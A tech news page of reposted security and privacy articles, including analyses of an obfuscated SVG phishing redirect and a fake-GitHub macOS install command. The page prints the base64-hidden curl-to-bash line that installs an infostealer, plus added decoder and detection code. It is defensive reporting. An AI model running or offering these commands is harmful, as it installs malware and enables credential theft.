IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Neon App pays users to record their phone calls, sells data for AI training

TechCrunch reports on a “bizarre app” that invites you to record and share your audio calls so that it can sell the data to AI companies. And if that’s not weird enough on its own, it was ranking No. 2 in Apple’s US app store at the time of writing.

The name of the app is Neon Mobile and it promises to pay users hundreds or even thousands of dollars per year. Why would you do it? Its reasoning is the old “they already know everything about you anyway” adage and “you might as well get paid for it then.”

Neon will sell the data collected by the app to “AI companies for the purpose of developing, training, testing, and improving machine learning models, artificial intelligence tools and systems, and related technologies.”

The payment is $0.15 per minute if you’re the only Neon Mobile user in the conversation, and this doubles when the person on the other end uses the app as well. With a maximum payout of $30 per day and the understanding that the call has to be made through the app, you’ll have to be on the phone a lot to make thousands of dollars, but we can see why this might be an attractive offer to some people.

Some people are already planning to do it as a second job. One commenter says:

“They just want the voice data. So if you and a friend agree to talk about pretend situations for an hour a day to make $900 a month that seems pretty easy. If both parties are doing it that comes out to $18 an hour which is pretty good.”

Neon Mobile promises that:

  • It will never sell your personal data to any third party.
  • It does not knowingly or intentionally collect personal data about children under 16.
  • It will only record your side of the call unless it’s with another Neon user.

We have some doubts about how it will accomplish the one-sided recording technically, as well as how it will automatically filter out names, numbers, and other personal details.

As always, there are some caveats. Looking at the Privacy Policy we noticed:

  • Neon collects a lot of personal and technical data about you, like identifiers, contact details, usage data, payment information, event participation, account activity, testimonials, and other data from third-party sources.
  • Any third-party integrations are your responsibility. These third-party integrations may ask for permissions to access your personal data, or send information to your Neon Account. It is the user’s responsibility to review any third-party integrations.
  • Your personal data is shared with others. Neon regularly passes personal data to service providers and “trusted partners” for things like hosting, marketing, sales support, and analytics.
  • You have certain rights, but not absolute ones. You can request to access, delete, or correct the personal data Neon Mobile collects or maintains about you, but Neon may deny requests when the law allows.
  • You need to watch out for opt-outs. If Neon wants to use your data in a new way, or if it plans to disclose it to another third party not already covered in the Privacy Policy, it will give you the choice to refuse this new use or disclosure. But this is an “opt out” opportunity, so you will have to pay close attention to every change in the Terms of Service and the Privacy Policy.
  • The disclosure rights are quite broad. Neon reserves the right to disclose data to comply with legal obligations, protect rights and safety, investigate fraud, or respond to law enforcement requests, with broad latitude for “compelled disclosure”.

In other words, Neon gathers and combines a wide range of personal and usage data, shares it with partners and third parties, and reserves broad rights to repurpose or disclose it—leaving users to monitor policy changes and opt out if they don’t agree.

Given the breadth of the data collection and the numerous caveats (while framed as protections against abuse), I’d argue that Neon Mobile is paying a low price for users’ privacy.

It’s also worth noting that if you become disappointed with the app or its returns, getting out takes more than just deleting the app from your device.

“If you delete the Neon app (but do not close your Neon account), your calls can still be recorded when other Neon users who have the app call you. If you want to stop call recordings with other Neon users, close your account through your profile settings.”

I’d also advise anyone using the app to inform the person on the other end that the conversation will be recorded, since failing to do so may have legal implications.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

New SVG-based phishing campaign is a recipe for disaster

We’ve written in the past about cybercriminals using SVG files for phishing and for clickjacking campaigns. We found a new, rather sophisticated example of an SVG involved in phishing.

For readers who missed the earlier posts, SVG files are not always simply image files. Because they are written in XML (eXtensible Markup Language), they can contain HTML and JavaScript code, which cybercriminals can exploit for malicious purposes.

Another advantage for phishers is that, on a Windows computer, SVG files get opened by Microsoft Edge, regardless of what your default browser is. Since most people prefer to use a different browser, such as Chrome, Edge can often be overlooked when it comes to adding protection like ad-blockers and web filters.

The malicious SVG we’ve found uses a rather unusual method to send targets to a phishing site.

Inside RECElPT.SVG we found a script containing a lot of food/recipe-related names (“menuIngredients”, “bakingRound”, “saladBowl”, etc.), which are all simply creative disguises for obfuscating the code’s malicious intentions.

This is the part of the code where the phishers hid a redirect:

function to define the ingredients

Upon close inspection, the illusion of an edible recipe quickly disappears. 141 cups of eggs, anyone?

But picking the code apart, we noticed that the decoder works like this:

  1. Search for data-ingredients="…" in the given text.
  2. Split the string inside the attribute by commas to get a list. E.g., 219cups_flour, 205tbsp_eggs,…
  3. For each element, extract the leading numeric value (e.g., 219 from 219cups_flour).
  4. Subtract 100 from this value.
  5. If the result is an ASCII printable character (ranging from 32–126), then convert it to the character with that number.
  6. Join all characters together to form the final decoded string.

Using this method, we arrived at window.location.replace("https://outuer.devconptytld[.]com.au/");
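The decoder described in the six steps above, written out as an added example (this is not code from the Malwarebytes post or from the malicious SVG). The sample SVG, its decoy ingredient names and the placeholder host phish.example.invalid are constructed here for testing, and the list of markers to flag is an assumption about what an analyst or mail filter would look for:

```python
import re

# Added example (not code from the Malwarebytes post): a decoder for the
# "recipe" obfuscation described above, plus a constructed sample SVG to run it on.
INGREDIENTS_RE = re.compile(r'data-ingredients="([^"]*)"')
LEADING_INT_RE = re.compile(r"^\s*(\d+)")
OFFSET = 100  # the campaign adds 100 to each ASCII code


def decode_ingredients(text: str) -> str:
    """Recover the hidden string from the first data-ingredients="..." attribute.

    Follows the six steps in the article: find the attribute, split on commas,
    take each item's leading integer, subtract 100, keep only printable ASCII
    (32-126) and join the characters.
    """
    match = INGREDIENTS_RE.search(text)
    if not match:
        return ""
    chars = []
    for item in match.group(1).split(","):
        number = LEADING_INT_RE.match(item)
        if not number:
            continue  # no leading digits: pure decoy, skip it
        code = int(number.group(1)) - OFFSET
        if 32 <= code <= 126:
            chars.append(chr(code))
    return "".join(chars)


# Constructed decoy units, used only to build a sample in the same style.
DECOY_UNITS = ("cups_flour", "tbsp_eggs", "tsp_salt", "g_butter", "ml_milk")


def encode_ingredients(payload: str) -> str:
    """Inverse of the scheme, used here only to build test input."""
    return ",".join(
        f"{ord(ch) + OFFSET}{DECOY_UNITS[i % len(DECOY_UNITS)]}"
        for i, ch in enumerate(payload)
    )


# Constructed sample: a redirect to a placeholder host, not the real campaign URL.
SAMPLE_PAYLOAD = 'window.location.replace("https://phish.example.invalid/");'
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">'
    f'<g id="menuIngredients" data-ingredients="{encode_ingredients(SAMPLE_PAYLOAD)}"/>'
    "<script>/* decoder stub */</script></svg>"
)

# Strings a defender would flag once the payload is decoded (assumed list).
REDIRECT_MARKERS = ("window.location", "location.href", "document.write", "eval(", "atob(")


def triage_svg(svg_text: str) -> dict:
    """Decode any hidden payload and report indicators for an analyst or mail filter."""
    decoded = decode_ingredients(svg_text)
    markers = [m for m in REDIRECT_MARKERS if m in decoded]
    urls = re.findall(r"https?://[^\s\"')]+", decoded)
    return {
        "has_script": "<script" in svg_text.lower(),
        "decoded": decoded,
        "markers": markers,
        "urls": urls,
        "suspicious": bool(markers or urls),
    }


if __name__ == "__main__":
    report = triage_svg(SAMPLE_SVG)
    print("decoded :", report["decoded"])
    print("verdict :", "suspicious" if report["suspicious"] else "clean")
```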

window.location.replace is a JavaScript method that replaces the current resource with the one at the provided URL. In other words, it redirects the target to that location if they open the SVG file.

When redirected, the user will see this prompt, which is basically intended to hide the real location of the server behind Cloudflare services, but also provides some sense of legitimacy for the visitor.

Verify you're not a robot

It doesn’t matter what the user does here; they will be forwarded again, with the code passing the e parameter (the target’s email address) on to the next destination.

But this is where our adventure ended. For us, the next site was an empty one.

We couldn’t determine what conditions had to be met to get to the next stage of the phishing expedition. But it is highly likely it will display a fake login form (almost certainly Microsoft 365- or Outlook-themed), to capture the target’s username and password.

Microsoft flagged a similar campaign which was clearly obfuscated with AI assistance and appeared even more legitimate at first glance.

Some remarks we want to share about this campaign:

  • We found several versions of the SVG file dating back to August 26, 2025.
  • The attacks are very targeted, with the target’s email address embedded in the SVG file.
  • The phishing domain could be a typosquat of the legitimate devconptyltd.com.au, which could mean the targets were doing business with Devcon Pty Ltd, which owns that domain. This is a tactic we often see in Business Email Compromise (BEC) attacks.
  • We found several subdomains of devconptytld[.]com.au associated with this campaign. The domain’s TLS certificate dates back to August 24, 2025 and is valid for 3 months.

How to stay safe from SVG phishing attacks

SVG files are an uncommon attachment to receive, so it’s good to keep in mind that:

  • They are not always “just” image files.
  • Several phishing and malware campaigns use SVG files, so they deserve the same treatment as any other attachment: don’t open one until a trusted sender confirms they sent it.
  • Always check the address of a website asking for credentials. Or use a password manager; it will not auto-fill your details on a fake website.
  • Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
  • Use an email security solution that can detect and quarantine suspicious attachments.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

LinkedIn will use your data to train its AI unless you opt out now

LinkedIn plans to share user data with Microsoft and its affiliates for AI training. Framed as “legitimate interest”, it won’t ask for your permission—instead you’ll have to opt out before the deadline.

Microsoft has made major investments in ChatGPT’s creator OpenAI, and as we know, the more data we feed a Large Language Model (LLM), the more useful answers the AI chatbot can provide. This explains why LinkedIn wants your data, but not how it went about getting it.

The use of personal data for AI improvements and product personalization always raises privacy concerns, and we would expect a much lower participation rate if users had to sign up for it. The problem in this case is that you were already opted in by default, and your data will be used up to the point where you opt out.

To opt out, you should go to your LinkedIn privacy settings:

  • Navigate to Settings & Privacy > Data privacy > Data for Generative AI Improvement.
  • Toggle off Use my data for training content creation AI models.
  • Optionally, file a Data Processing Objection request to formally object. To do this, access the Data Processing Objection Form, select Object to processing for training content-generating AI models, and send a request. Non-members can also file an objection if their personal data was shared on LinkedIn by a member.

You should also review and clean up older or sensitive posts, profiles, or resumes to reduce exposure. Again, opting out only stops future training on new data; it does not retract data already used.

The data LinkedIn might share is pretty extensive:

  • Profile data, which includes your name, photo, current position, past work experience, education, location, skills, publications, patents, endorsements, and recommendations.
  • Job-related data, such as resumes, responses to screening questions, and application details.
  • The content you posted, such as posts, articles, poll responses, contributions, and comments.
  • Feedback, including ratings and responses you provide.

Who is affected and how?

There are some contradictory statements circulating about which countries the update to LinkedIn’s terms applies to. The official statement says members in the EU, EEA, Switzerland, Canada, and Hong Kong have until November 3, 2025, to opt out. (The EEA is the EU plus Iceland, Liechtenstein, and Norway.) Other sources say that UK users are affected as well. We’d advise anyone who has that setting and doesn’t want to participate to turn the “Use my data…” setting off.

Reportedly, a quarter of the over 1 billion LinkedIn users are in the US, so they can provide a lot of valuable data. In the terms update, users in the US are included in the part where it says:

“Starting November 3, 2025, we will share additional data about members in your region with our Affiliate Microsoft so that the Microsoft family of companies can show you more personalized and relevant ads. This data may include your LinkedIn profile data, feed activity data, and ad engagement data; it does not include any data that your settings do not allow LinkedIn to use for ad purposes.”

You can review those settings and act as you prefer your data to be handled.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

TikTok is misusing kids’ data, says privacy watchdog

A group of privacy commissioners in Canada has accused TikTok of scooping up information about hundreds of thousands of children who shouldn’t have been on the platform.

The Chinese social media giant is also accused of collecting data on Canadian users without properly explaining what it does with that information, the watchdogs added.

In a report issued last week, the Federal Privacy Commissioner, along with commissioners in British Columbia, Québec and Alberta, accused the service of failing to keep children under 13 off its platform. The service’s terms and conditions prohibit people under that age from using TikTok. From the report:

“The tools implemented by TikTok to keep children off its platform were largely ineffective. This was particularly true in respect of the majority of users who are ‘lurkers’ or ‘passive users’, who view videos on the platform without posting video or text content.”

Inadequate age gates and inappropriate data collection

TikTok relied on a voluntary age gate to keep very young users off the platform. That system simply trusts a person to correctly enter their birth date, the report found.

It used stronger protection, in the form of facial analytics, to stop those under 18 from using its TikTok LIVE live-streaming function. However, when it did use facial analysis, the company didn’t explain to users that it would use that information to determine their age and gender for ads and content recommendations, the privacy commissioners added.

TikTok collects significant data on its users, explained the report. This includes their demographics, interests, and location. A demonstration of its advertising portal even highlighted the possibility of targeting people with ads based on their transgender status. The report said:

“TikTok claimed that this was not supposed to be possible but was unable to explain how or why this option had been available.”

The company also failed to adequately explain to young users how it would use their data. It used the same messaging that it gave to adults, said the privacy commissioners, who added that even that messaging was inadequate. The report added:

“The investigation uncovered that TikTok removes approximately 500,000 underage users from the platform each year. Where these children were engaging with the platform before being removed, TikTok was already collecting, inferring and using information about them to serve them targeted ads and recommend tailored content to them.”

What TikTok has agreed to do

TikTok has disagreed with the commissioners’ findings, but will nevertheless build three new age assurance systems into its service that will be better at keeping underage users off the platform. It will also make its privacy policy clearer about how it targets advertising and recommends content, and how it uses biometric data, and it will publish a plain-language policy for teens.

Finally, it will put a ‘Privacy Settings Checkup’ system in place, making it easier for Canadians to review and set their privacy choices.

This isn’t the first time that Canada’s government has clashed with TikTok. Last November it had already ordered TikTok Technology Canada to wind down operations, citing national security concerns about its owner ByteDance operating on Canadian soil. This didn’t affect people’s ability to use the app in Canada, though. The move prompted TikTok to challenge the order in federal court.

South of the border, a group of investors including Oracle chair Larry Ellison, Dell Technologies chair Michael Dell, and Rupert and Lachlan Murdoch are negotiating the acquisition of TikTok’s US operation. A successful bid would see the US data stored in Oracle’s Cloud system.


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

Police using drones to read your license plates, warns EFF

Police are using drones as flying automated license plate readers (ALPRs), according to a report by the Electronic Frontier Foundation (EFF).

And where there is a market, a provider will jump in. Or was it the other way around this time? Flock Safety, for example, recently told a group of potential law enforcement customers interested in Drone as First Responder (DFR) programs that its drone can be used as a flying license plate reader camera as well.

An ALPR system is an intelligent surveillance system that automatically identifies and documents license plates of vehicles by using optical character recognition. This is not necessary for the drones’ main task—it’s an extra feature.

We can definitely see the benefits of DFR programs, which tell police officers what to expect before they arrive at the scene. Increasing situational awareness by using drones makes it safer for both law enforcement officers and the public.

The problem is that drones equipped with ALPR technology can systematically record vehicle location and movement, indifferent to whether it’s in public or private spaces. Unlike fixed cameras, drones can reach places and angles otherwise inaccessible, so they can look in backyards, private driveways, and even through windows.

Depending on the local circumstances, police DFR programs involve a fleet of drones, which can range in number from a few to a few hundred. Low operational costs enable police and their drones to collect and store enormous amounts of data. These practices increase the risk of breaches or leaks. Agencies often keep ALPR and drone-captured data well beyond its useful period, store it on centralized or external servers, and regularly share it with other agencies or federal authorities, according to the EFF.

According to EFF’s Atlas of Surveillance there are approximately 1,500 police departments known to have a drone program. A recent Wired investigation raised concerns about one police department’s program, finding that roughly one in 10 drone flights lacked a stated purpose and that for hundreds of deployments the reason was listed as “unknown.”

There is a thin line between unwarranted surveillance and accidental recordings. The EFF states:

“While some states do require a warrant to use a drone to violate the privacy of a person’s airspace, Alaska, California, Hawaii, and Vermont are currently the only states where courts have held that warrantless aerial surveillance violates residents’ constitutional protections against unreasonable search and seizure absent specific exceptions.”

Combined with Artificial Intelligence (AI)—and these are already operational—drones can become a force to be reckoned with. But we need to start thinking about regulations to limit the privacy implications, so we don’t end up in a surveillance-state society.

Flock has previously described its desire to connect ALPR scans to additional information on the person who owns the car, meaning we may not be far from a time when police see your vehicle drive by and quickly learn that it’s your car, along with a host of other details about you.



Malwarebytes for Teams now includes VPN

Running a small business today can hardly be done from a single device, a single location, or a single network.

Staying cybersecure is quite the same.

To extend the security and privacy of small business owners, no matter where you are, Malwarebytes for Teams now includes personal VPN access, for no additional cost, for all registered devices. Whether you’re typing up a draft on your tablet at a café, answering urgent emails from your smartphone at the airport, or just protecting your browsing activity on your laptop, connecting to a personal VPN provides that extra comfort that what you’re doing online is your business and your business only.

With a personal VPN you can:

  • Guard your online activity from prying eyes, whether on your laptop, smartphone, or tablet.
  • Access information, content, and resources that are typically restricted by location.
  • Maintain high speed connections for everything you do.

VPNs (Virtual Private Networks) have a bit of a dual reputation right now: They’re either IT tools that help multinational enterprises connect to corporate networks, or they’re covert programs that help paranoid privacy hawks slip by undetected online. The truth is that VPNs are for everyone, and that’s because what they offer is a benefit to all.

VPNs encrypt and protect your online traffic so that eavesdroppers can’t spy on your browsing behavior. This is useful both at public locations and in your office or home, because not all cyber snoops are hackers or criminals. In fact, some of the most active eavesdroppers are Internet Service Providers themselves, which sell consumer data for profit.

VPNs also provide a simple way to connect to an increasingly segmented internet. Despite the name, “the world wide web” can appear quite different when you travel to another country. The streaming platforms you enjoy at home can be blocked, their digital libraries can differ, and entirely benign resources can be gated behind separate laws. By connecting to any variety of servers through a VPN, you can access the internet you know and rely on, no matter your physical location.

It’s important to remember, however, that a VPN is just one part of a larger cybersecurity strategy. You still need to protect your small business’s devices from malware infections, rogue viruses, shady websites, and online scams.

For those threats, Malwarebytes for Teams also keeps you safe, especially when you’re mobile.  

Malwarebytes Scam Guard is available on iOS and Android

Malwarebytes Browser Guard is a free browser add-on that stops invasive ad trackers and flags dangerous websites connected to cybercriminal networks that are cleverly disguised to steal your information or infect your device. And for every other type of concerning message, email, link, or QR code, Malwarebytes Scam Guard for iOS and Android provides 24/7, AI-powered evaluations on who to trust, where to click, and what to ignore.

As every small business is unique, every security plan must adapt. Malwarebytes for Teams is proud to offer the security and privacy options that keep a modern mobile business safe online from hackers, scammers, and digital snoops.

Fake Malwarebytes, LastPass, and others on GitHub serve malware

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

Search results for Malwarebytes Github MacOS

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

Fake Malwarebytes GitHub page

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

Download and install instructions for fake software

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

Blocked by Browser Guard due to a risky pattern

Here’s a technical breakdown of the instructions provided to the visitor:

  • /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
  • The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
  • $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d): here echo ... | base64 -d decodes the long Base64-encoded string.
  • curl -fsSL is a command to download data from the web. The options mean:
    • -f: Fail silently for HTTP errors.
    • -s: Silent mode (no progress bar).
    • -S: Show errors if -s is used.
    • -L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.
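To see what a pasted “install” command would really do before anything runs, here is an added triage helper (not code from the post or from the campaign) that resolves the $(echo … | base64 -d) layer the way the shell would and flags the bash -c "$(curl …)" and curl … | bash patterns described above. The sample command and its host installer.example.invalid are constructed placeholders, not the campaign’s real URL:

```python
import base64
import binascii
import re

# Added example (not code from the Malwarebytes post): a triage helper that
# resolves the $(echo <base64> | base64 -d) trick described above and flags the
# resulting "fetch a script and hand it straight to bash" pattern.
B64_ECHO_RE = re.compile(
    r"\$\(\s*echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|-D|--decode)\s*\)"
)
URL_RE = re.compile(r"https?://[^\s\"')]+")
# bash -c "$(curl ...)" as in the campaign, or the classic curl ... | bash
REMOTE_EXEC_RES = (
    re.compile(r"\b(?:bash|sh|zsh)\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
    re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b"),
)


def resolve_base64_echo(command: str) -> str:
    """Substitute each $(echo <b64> | base64 -d) with its decoded text, as the shell would."""

    def _decode(match: re.Match) -> str:
        try:
            return base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return match.group(0)  # leave undecodable text untouched

    # Repeat in case one decoded layer reveals another.
    previous = None
    while previous != command:
        previous, command = command, B64_ECHO_RE.sub(_decode, command)
    return command


def analyze_install_command(command: str) -> dict:
    """Report what a pasted install command would really do."""
    resolved = resolve_base64_echo(command)
    remote_exec = any(r.search(resolved) for r in REMOTE_EXEC_RES)
    return {
        "resolved": resolved,
        "urls": URL_RE.findall(resolved),
        "hidden_layers": resolved != command,
        "remote_exec": remote_exec,
        "verdict": "block" if remote_exec else "review",
    }


# Constructed sample mirroring the campaign's shape; the host is a placeholder.
SAMPLE_URL = "https://installer.example.invalid/hun/install.sh"
SAMPLE_B64 = base64.b64encode(SAMPLE_URL.encode()).decode()
SAMPLE_COMMAND = f'/bin/bash -c "$(curl -fsSL $(echo {SAMPLE_B64} | base64 -d))"'

if __name__ == "__main__":
    report = analyze_install_command(SAMPLE_COMMAND)
    print(report["resolved"])
    print(report["verdict"], report["urls"])
```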

This is dangerous for the user on many levels. Because there is no prompt or review, the user never gets a chance to see or assess what the downloaded script will do before it runs. And because the script is fetched and executed from the command line, it sidesteps the normal file-download protections and can do anything the attacker wants.

The files to download have already been taken down, but users who recognize this infection chain are advised to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

  • 1Password
  • ActiveCampaign
  • After Effects
  • Audacity
  • Auphonic
  • Basecamp
  • BetterSnapTool
  • Biteable
  • Bitpanda
  • Bitsgap
  • Blog2Social
  • Blue Wallet
  • Bonkbot
  • Carbon Copy Cloner
  • Charles Schwab
  • Citibank
  • CMC Markets
  • Confluence
  • Coolors
  • DaVinci Resolve
  • DefiLlama
  • Desktop Clockology
  • Desygner
  • Docker
  • Dropbox
  • E-TRADE
  • EigenLayer
  • Fidelity
  • Fliki
  • Freqtrade Bot
  • Freshworks
  • Gemini
  • GMGN AI
  • Gunbot
  • Hemingway Editor
  • HeyGen
  • Hootsuite
  • HTX
  • Hypertracker
  • IRS
  • KeyBank
  • Lightstream
  • Loopback
  • Maestro Bot
  • Melon
  • Metatrader 5
  • Metricool
  • Mixpanel
  • Mp3tag
  • Mural
  • NFT Creator
  • NotchNook
  • Notion
  • Obsidian
  • Onlypult
  • Pendle Finance
  • Pepperstone
  • Pipedrive
  • Plus500
  • Privnote
  • ProWritingAid
  • Publer
  • Raycast
  • Reaper
  • RecurPost
  • Renderforest
  • Rippling
  • Riverside.fm
  • Robinhood
  • Rug AI
  • Sage Intacct
  • Salesloft
  • SentinelOne
  • Shippo
  • Shopify
  • SocialPilot
  • Soundtrap
  • StreamYard
  • SurferSEO
  • Thunderbird
  • TweetDeck
  • Uphold
  • Veeva CRM
  • Viraltag
  • VSCO
  • Vyond
  • Webull
  • Xai Games
  • XSplit
  • Zealy
  • Zencastr
  • Zenefits
  • Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

How to stay safe

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

  • Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
  • Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
  • Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
  • If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.


Can you disappear online? (Lock and Code S06E19)

This week on the Lock and Code podcast

There’s more about you online than you know.

The company Acxiom, for example, has probably determined whether you’re a heavy drinker, or if you’re overweight, or if you smoke (or all three). The same company has also probably estimated—to the exact dollar—the amount you spend every year on dining out, donating to charities, and traveling domestically. Another company, Experian, has probably made a series of decisions about whether you are “Likely,” “Unlikely,” “Highly Likely,” etc., to shop at a mattress store, visit a theme park, or frequent the gym.

This isn’t the data most people think about when considering their online privacy. Yes, names, addresses, phone numbers, and age are all important and potentially sensitive, and yes, there’s a universe of social media posts, photos, videos, and comments that are likely at the harvesting whim of major platforms to collect, package, and sell access to for targeted advertising.

But so much of the data that you leave behind online has nothing to do with what you willingly write, post, share, or say. Instead, it is data that is collected from online and offline interactions, like the items you add to a webpage’s shopping cart, the articles you read, the searches you make, and the objects you buy at a physical store.

Importantly, it is also data that is very hard to get rid of.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Peter Dolanjski, director of product at DuckDuckGo, about why the internet is so hungry for your data, how parents can help protect the privacy of their children, and whether it is pointless to try to “disappear” online.

“It’s not futile… Taking steps now, despite the fact that you already have information out there, will help you into the future.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

American Archive of Public Broadcasting allowed access to restricted media for years

A security flaw in the American Archive of Public Broadcasting (AAPB) website allowed unauthorized access to protected and private media, according to BleepingComputer.

The American Archive of Public Broadcasting (AAPB) is a collaborative initiative between the Library of Congress and WGBH Educational Foundation, aimed at digitally preserving historically significant public radio and television programs from the past seven decades.

The archives encompass a wide array of materials: news and public affairs programs, local history productions, educational content, science, music, art, literature, environmental programming, and raw interviews from landmark documentaries. The digitized content contains millions of items, including unique, sometimes sensitive material documenting pivotal events, regional culture, and documentary evidence of America’s civil and artistic history.

Access without proper controls could facilitate copyright violations or the misuse of material critical for scholarship, public education, and future generations. And that’s what the discovered vulnerability provided.

Not only did this vulnerability go unnoticed for years, but the researcher who discovered the hole found that active exploitation had started at least as early as 2021, even after a previous report by the same researcher to AAPB. When BleepingComputer reached out, however, AAPB implemented a fix within 48 hours, and the researcher was able to confirm it worked.

AAPB’s Communications Manager, Emily Balk, told BleepingComputer:

“We’re committed to protecting and preserving the archival material in the AAPB and have strengthened security for the archive.”

The exploit method began circulating on Discord in mid-2024, but even before that, a simple script allowed users to request media files by ID and bypass AAPB’s access controls. This method worked even if the requested media files fell into the protected or private categories: as long as the request carried a valid media ID, the content could be downloaded.
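The flaw described above is a missing object-level authorization check. The following is an added example, not AAPB’s code: a media handler that serves any valid ID, beside a hardened version that decides on the item’s own access category, plus a small log check for the scripted bulk downloading the article describes. The catalogue, roles, IDs, IP addresses and log format are constructed assumptions.

```python
from collections import defaultdict
# Constructed catalogue, not real archive records; categories follow the article.
CATALOGUE = {
    "media-0001": {"category": "public", "file": "public_show.mp4"},
    "media-0002": {"category": "protected", "file": "onsite_only.mp4"},
    "media-0003": {"category": "private", "file": "unreleased_interview.mp4"},
}
# Roles are assumptions: 'anonymous' has no rights, 'onsite' is a reading-room
# terminal, 'staff' may see private items. Unlisted categories are denied.
ALLOWED = {
    "public": {"anonymous", "onsite", "staff"},
    "protected": {"onsite", "staff"},
    "private": {"staff"},
}

class AccessDenied(Exception):
    pass

def serve_media_vulnerable(media_id: str) -> str:
    # Pattern the article describes: a valid ID is the only check, so any item is served.
    return CATALOGUE[media_id]["file"]

def can_access(media_id: str, role: str) -> bool:
    # Server-side decision on the item's own category, on every request.
    item = CATALOGUE.get(media_id)
    return item is not None and role in ALLOWED.get(item["category"], set())

def serve_media(media_id: str, role: str) -> str:
    # Hardened: unknown and denied IDs raise the same error (no ID-existence oracle).
    if not can_access(media_id, role):
        raise AccessDenied("not authorized for this item")
    return CATALOGUE[media_id]["file"]

# Constructed access-log lines (not real traffic): 'client=<ip> id=<media id>'.
SAMPLE_LOG = [
    "client=198.51.100.7 id=media-0001",
    "client=198.51.100.7 id=media-0002",
    "client=198.51.100.7 id=media-0003",
    "client=203.0.113.9 id=media-0001",
]

def bulk_requesters(log_lines, threshold: int = 3) -> dict:
    # Detection: clients fetching >= threshold distinct IDs, a rough bulk-download signal.
    seen = defaultdict(set)
    for line in log_lines:
        fields = dict(part.split("=", 1) for part in line.split())
        seen[fields["client"]].add(fields["id"])
    return {c: len(ids) for c, ids in seen.items() if len(ids) >= threshold}
```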

Apparently, data-hoarder communities that do not care about copyright abused and shared the method for many years. The main impact was unauthorized access to, and sharing of, archival media, some of which was not intended for public release. This is an institutional and copyright issue.

However, users should:

  • Avoid sharing or downloading protected or leaked content, as you could be in a legal gray area.
  • Be wary of unofficial sources circulating rare or unpublished public broadcasting material.
  • Anticipate there might be phishing emails coming based on this breach. As with other news events, phishers will use them as clickbait.


Scammers are impersonating the FBI to steal your personal data

Been scammed? Hoping to report it to the FBI? Definitely do so, but be careful. Spoofed versions of the FBI’s Internet Crime Complaint Center (IC3) website are now circulating online, and they lead straight back to the scammers.

The FBI issued an advisory last week, warning that cybercriminals are setting up fake versions of their site to tempt people into entering their personal information:

